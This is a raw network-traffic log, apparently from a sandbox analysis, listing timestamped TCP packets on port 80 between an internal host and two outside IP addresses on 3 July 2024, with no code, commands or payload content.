                                                                Jul 3, 2024 08:38:19.966182947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966192961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966204882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966214895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966216087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966226101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966237068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966243029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966247082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966257095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966279030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966295958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966619968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966629982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966640949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966655970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966658115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966667891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966675043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966679096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966689110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966701031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966706991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966723919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966751099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.966938972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966948986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.966981888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967010021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967021942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967032909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967042923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967050076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967053890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967080116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967104912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967114925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967125893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967135906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967147112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967150927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967155933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967165947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967170954 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967201948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967617035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967628002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967638016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967648983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967658997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967660904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967669010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967675924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967679977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967690945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967725039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967758894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.967948914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967959881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967969894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967981100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.967983007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968018055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968084097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968095064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968106985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968118906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968121052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968130112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968146086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968147039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968157053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968167067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968175888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968177080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968188047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968194962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968199015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.968213081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.968230963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:20.052350998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:20.052367926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:20.052437067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:20.052457094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:20.701340914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:20.701391935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:20.706597090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:20.706613064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.529583931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.529872894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:21.625646114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:21.630511999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.802306890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.802325964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.802336931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.802447081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:21.805831909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:21.810847044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.981946945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:21.982100964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:22.000190020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:22.005661964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:22.701109886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:22.701253891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:22.730226994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:22.735114098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:23.439107895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:23.439311028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:23.443912029 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:23.448838949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:23.448906898 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:23.449083090 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:23.453917027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162043095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162075996 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162087917 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162153006 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.162173033 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162179947 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.162185907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162197113 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162208080 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162219048 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162228107 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.162247896 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.162383080 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162395000 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.162420988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.162441969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.167597055 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.167645931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.167656898 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.167685032 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.167718887 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288428068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288471937 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288494110 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288497925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288510084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288522959 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288532972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288532972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288553953 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288805008 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288842916 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288861990 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288873911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288897038 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288921118 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.288968086 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.288979053 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289004087 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.289617062 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289655924 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.289669037 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289685011 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289702892 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.289726019 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.289782047 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289792061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.289817095 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.289839029 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.290543079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.290563107 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.290580988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.290604115 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.290734053 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.290745020 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.290766001 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.290770054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.290792942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.290807962 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.291600943 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.291610956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.291621923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.291646004 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.291670084 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.293368101 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.293407917 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414170027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414220095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414232016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414249897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414309978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414336920 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414359093 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414371014 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414381027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414391994 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414397955 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414428949 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414581060 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414592981 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414604902 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414621115 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414622068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414633989 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414637089 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414669037 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414869070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414911985 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.414946079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414956093 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.414982080 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415007114 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415071011 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415087938 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415110111 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415143967 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415312052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415328979 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415338993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415358067 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415376902 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415383101 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415389061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415400982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415411949 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415433884 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415690899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415702105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415713072 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415730953 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415750027 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415831089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415842056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415852070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415863037 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.415875912 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.415893078 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416054964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416066885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416076899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416086912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416095972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416105032 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416120052 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416138887 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416564941 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416608095 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416613102 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416625023 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416646957 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416666031 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416748047 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416758060 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416769028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416779041 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416789055 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416810989 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.416963100 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416973114 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416982889 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.416992903 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.417006016 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.417020082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.417045116 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.419167042 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.419204950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.419223070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.419256926 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.539772034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539797068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539814949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539827108 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.539860964 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.539880037 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539891958 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539915085 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539931059 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.539962053 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.539987087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.539997101 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540021896 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540050983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540060997 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540061951 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540100098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540128946 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540139914 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540162086 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540180922 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540236950 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540246964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540257931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540290117 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540319920 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540358067 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540461063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540488005 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540499926 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540504932 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540518999 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540533066 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540788889 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540801048 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540812016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540822029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540832043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540836096 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540870905 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540896893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540908098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540918112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540927887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.540931940 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.540958881 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541063070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541073084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541083097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541096926 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541096926 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541126966 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541285038 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541295052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541305065 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541315079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541318893 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541327000 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541342974 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541342974 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541356087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541372061 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541389942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541667938 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541678905 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541687965 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541698933 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541706085 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541733980 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541858912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541870117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541879892 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541889906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541892052 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541901112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541910887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541920900 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541923046 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541932106 CEST804971377.91.77.81192.168.2.6
